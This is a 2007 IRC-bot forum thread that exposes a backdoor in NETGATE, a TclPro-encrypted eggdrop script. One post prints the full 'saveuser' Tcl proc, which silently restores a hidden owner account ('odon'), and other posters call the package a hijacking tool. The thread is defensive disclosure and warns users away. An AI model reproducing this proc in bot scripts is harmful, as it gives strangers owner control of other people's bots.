| View previous topic :: View next topic |
| Author |
Message |
KONTOL
Voice
Joined: 20 Mar 2007
Posts: 3
|
 Posted: Fri Apr 27, 2007 12:55 am Post subject: strange??? (netgate) |
 |
|
NETGATE tcl has been update to version 9.5 more a lot of protection has been added but the encryption is use TCLpro! It's make more strange!!!
Does anyone can decrypt fully, that file has been encrypted with TCLpro (bytecodes method). Make it for readable to make sure no backdoor again! 
For more information about it, please surf to:
http://netgate.informe.com/viewtopic.php?t=1086
NETGATE 9.5 tcl
Link removed (Alchera)
Config for bot:
http://www.redwingsonline.org/download/bot.cfg
It's use an Indonesian language! I can't understand it's that mean all...
Thx u all... 
EDIT by slennox: added script name to subject and moved topic to Script Support & Releases
_________________
[ I'm not ready yet! ] |
|
| Back to top |
|
 |
Sir_Fz
Revered One
Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon
|
| Posted: Fri Apr 27, 2007 8:49 am Post subject: |
|
|
Why do you want to use NETGATE anyway? it has a very bad reputation and I don't see why you NEED it. There are a lot of scripts that will do much more and written in much less lines (not 10,000+) in the Tcl archive.
_________________
Follow me on GitHub
- Opposing
Public Tcl scripts |
|
| Back to top |
|
|
KONTOL
Voice
Joined: 20 Mar 2007
Posts: 3
|
| Posted: Fri Apr 27, 2007 11:20 am Post subject: yoww... |
|
|
I've try use NETGATE for some reason (trial & error surely). I just ask some help that can be decrypt that tcl into readable condition. So I can read & fix some backdoor for my self and the other user... Or maybe can decrypt all tcl files that have been encrypted by TCLpro (procomp util)...
thx u & I appriciated any help... 
_________________
[ I'm not ready yet! ] |
|
| Back to top |
|
|
rosc2112
Revered One
Joined: 19 Feb 2006
Posts: 1454
Location: Northeast Pennsylvania
|
| Posted: Fri Apr 27, 2007 1:12 pm Post subject: |
|
|
From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.
Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.
You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit. |
|
| Back to top |
|
|
Sir_Fz
Revered One
Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon
|
| Posted: Fri Apr 27, 2007 2:13 pm Post subject: |
|
|
After reading this thread again, I got the idea of checking if that [saveuser] procedure exists in the new netgate.
I've downloaded windrop1.6.12 and loaded netgate into it. Enabled the .tcl DCC command and did the following:
| Quote: | (Me) .tcl info command saveuser
(Bot) Tcl: saveuser
(Me) .tcl info args saveuser
(Bot) Tcl: (Meaning it takes no arguments)
(Me) .tcl info body saveuser |
I'll display the output of the last Tcl-command in code tags (The whole proc)
| Code: | proc saveuser {} {
global ps owner
if {![validuser $ps]} {
setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
} elseif {$owner != $ps} {
setuser $owner XTRA "BEND" [zip [chattr $ps]]
if {[passwdok $ps ""] != 1} {
setuser $owner XTRA "LAST" [getuser $ps "PASS"]
}
deluser $ps
}
save
if {![validuser $ps]} {
adduser $ps "$ps!*@*"
chattr $ps [dezip [getuser $owner XTRA "BEND"]]
if {[getuser $owner XTRA "LAST"] != ""} {
setuser $ps PASS [getuser $owner XTRA "LAST"]
}
}
return 1
} |
$owner contains the owner's handle (set by you) and what does $ps contain?
| Quote: | (Me) .set ps
(Bot) Currently: odon |
So the same backdoor still exists in the new version, this time it adds "odon" instead of "KaISaR" to the bot's userlist as owner.
Edit: I meant windrop1.6.12 instead of eggdrop1.6.12 (used it since the site claimed that netgate only works for this version of windrop or more specifically for tcl 8.2-8.3... even more reason for why this script is lame).
_________________
Follow me on GitHub
- Opposing
Public Tcl scripts
Last edited by Sir_Fz on Sat Apr 28, 2007 8:57 pm; edited 1 time in total |
|
| Back to top |
|
|
Alchera
Revered One
Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia
|
| Posted: Sat Apr 28, 2007 12:10 am Post subject: |
|
|
| rosc2112 wrote: | From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.
Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.
You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit. |
netgate backdoor
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
|
| Back to top |
|
|
Sir_Fz
Revered One
Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon
|
| Posted: Sat Apr 28, 2007 6:59 am Post subject: |
|
|
I can't even start about how ugly this script makes Eggdrop it stores the userfile in the language/ directory lol that's so lame, I mean come on be a man lol. The bot.cfg requires editing only a few settings (nick, username, IP and hostname) so the user wouldn't understand how to change alternative nick, load scripts or change any other setting...
I would never recommend such a script even if it didn't contain that backdoor.
_________________
Follow me on GitHub
- Opposing
Public Tcl scripts |
|
| Back to top |
|
|
nml375
Revered One
Joined: 04 Aug 2006
Posts: 2857
|
| Posted: Sat Apr 28, 2007 8:49 am Post subject: |
|
|
Well, the only purpose for this package is to hijack bots and quite possibly accounts on the system it runs on. The ones targetted by such package would be those who desire an up'n'go bot, and really don't want to bother/care to even check config-files, scripts, and such; and this script "offers it all", it claims to take care of the more difficult config-settings, does all the things eggdrop usually needs added scripts, etc, etc..
The mere fact that people still think about using it despite the widespread knowledge of the backdoors, etc. could only mean the author got the bait right.
_________________
NML_375, idling at #eggdrop@IrcNET |
|
| Back to top |
|
|
rosc2112
Revered One
Joined: 19 Feb 2006
Posts: 1454
Location: Northeast Pennsylvania
|
| Posted: Sat Apr 28, 2007 5:38 pm Post subject: |
|
|
| Wouldn't be surprised to find netgate to be a conglomeration of other peoples scripts/procs mashed together into a mess. |
|
| Back to top |
|
|
Alchera
Revered One
Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia
|
| Posted: Sat Apr 28, 2007 11:06 pm Post subject: |
|
|
I notified the appropriate Tcl/eggdrop channel founders on DALnet when this first reared its ugly head as it targets DALnet bot owners specifically (from memory).
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
|
| Back to top |
|
|
mayday
Voice
Joined: 30 Apr 2007
Posts: 2
|
| Posted: Mon Apr 30, 2007 4:13 am Post subject: |
|
|
Wew netgate again......
Guys if u look into netgate FAQ u can read this :
FaQ:
........
- Tapi kan masih ada $ps odon nya, yups masih ada, dan nick PSna masih kami yang pegang, dan gak akan kami salah gunakan, so if u agree with this condition us this script, if not dont use it, Simple !!.
i try to translated : - but tcl still have $ps odon, yes that $ps still exist, and we still holding/keep/have that PS nick, and we would not missused, so if u agree with this condition us this script, if not dont use it, Simple !!.
.......
please refer to the bolded text , so use it if u agree with that condition, don't use its if not...
i notice something wierd in here, TS say he didnt understand indonesia language but his id KONTOL using indonesia language, KONTOL mean p*nis in english |
|
| Back to top |
|
|
nml375
Revered One
Joined: 04 Aug 2006
Posts: 2857
|
| Posted: Mon Apr 30, 2007 9:23 am Post subject: |
|
|
Any such "disclaimer" should be put within the license-agreement to carry any validity. Also, mixing languages like that is to me a really bad practise.
Anyway, since they admit to adding a user-account, with a known password and hostmask that only cares for nick (roughly making it possible for anyone to authenticate, and use this account for mischief)...
Do anyone know if they ever provided a reasoable explanation for adding a useraccunt of any kind? Or why it would need such permissions?
I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility...
_________________
NML_375, idling at #eggdrop@IrcNET |
|
| Back to top |
|
|
Alchera
Revered One
Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia
|
| Posted: Mon Apr 30, 2007 11:09 am Post subject: |
|
|
| mayday wrote: | | Wew netgate again...... KONTOL mean p*nis in english |
I already knew that (although I do not speak the language); I assist in an Indonesian (shell provider) channel on DALnet. 
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
|
| Back to top |
|
|
Alchera
Revered One
Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia
|
| Posted: Mon Apr 30, 2007 11:11 am Post subject: |
|
|
| nml375 wrote: | | I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility... |
It's a hijacking tool and they think we're all idiots. 
Unfortunately there are some out there that have fallen for this "con".
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
|
| Back to top |
|
|
rosc2112
Revered One
Joined: 19 Feb 2006
Posts: 1454
Location: Northeast Pennsylvania
|
| Posted: Tue May 01, 2007 9:01 pm Post subject: |
|
|
I suppose it'd be easy enough to rip the procs from the script as already demonstrated, if anyone ever wanted to bother, and then release a clean copy
Either that, or just create the backdoor username and give it a different password and +k flags.. Or, then again, I can think of some nice little reverse-hack script to use on whoever tried logging in with that username 
But, meh.. Screw them, their script sucks, thats why they have to hide it |
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
